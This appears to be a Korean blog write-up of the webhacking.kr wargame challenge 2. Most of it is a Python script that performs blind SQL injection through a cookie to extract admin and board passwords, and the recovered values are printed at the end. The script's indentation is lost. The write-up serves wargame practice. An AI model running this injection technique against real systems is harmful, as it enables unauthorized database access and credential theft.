table명은 게싱
freeboard와 admin의 password를 blindsqlinjection하고 board에서 주는 zip파일을 adminpage에서 admin 비번을 넣고 받은 비번으로 압축해제하면 key를 얻는다.
#webhacking.kr 2번
import http.client
import urllib
import string
def inj(q):
con=http.client.HTTPConnection('webhacking.kr')
head={'Host':'webhacking.kr'}
head['Upgrade-Insecure-Requests']=1
head['Cookie']='id=aaa; PHPSESSID=ddddd; time=1487488213 and '+q
con.request('GET','/challenge/web/web-02/',headers=head)
r=con.getresponse().read()
#print(r)
return b'09:00:01' in r
#print(inj('(select length(password) from admin)=10;'))
arr=list(string.ascii_letters+'1234567890')
print(arr)
adminpw=''
table='admin' #FreeB0aRd
for i in range(5,6):
for a in range(95,100):
q='(select ascii(substring(password,'+str(i)+',1)) from admin)='+str(a)+';'
print(q)
t=inj(q)
print(chr(a))
print(t)
if t:
adminpw+=a
print(adminpw)
break
for i in range(5,11):
for j, a in enumerate(arr):
q='(select ascii(substring(password,'+str(i)+',1)) from '+table+')='+str(ord(a))+';'
print(q)
t=inj(q)
print(a)
if t:
adminpw+=a
print(adminpw)
break
print(adminpw)
adminpw='0nly_admin'
freeboardpw='7598522ae'
'war game > webhacking.kr' 카테고리의 다른 글
| [webhacking.kr]57번 (0) | 2017.02.19 |
|---|---|
| [webhacking.kr] 41번 (0) | 2017.02.01 |
| [webhacking.kr]55번 left right을 이용한 blind sql (0) | 2017.01.31 |
| [webhacking.kr]22번 blind sql injection binary search (0) | 2017.01.30 |
| [webhacking.kr 21]blind sql injection (0) | 2017.01.30 |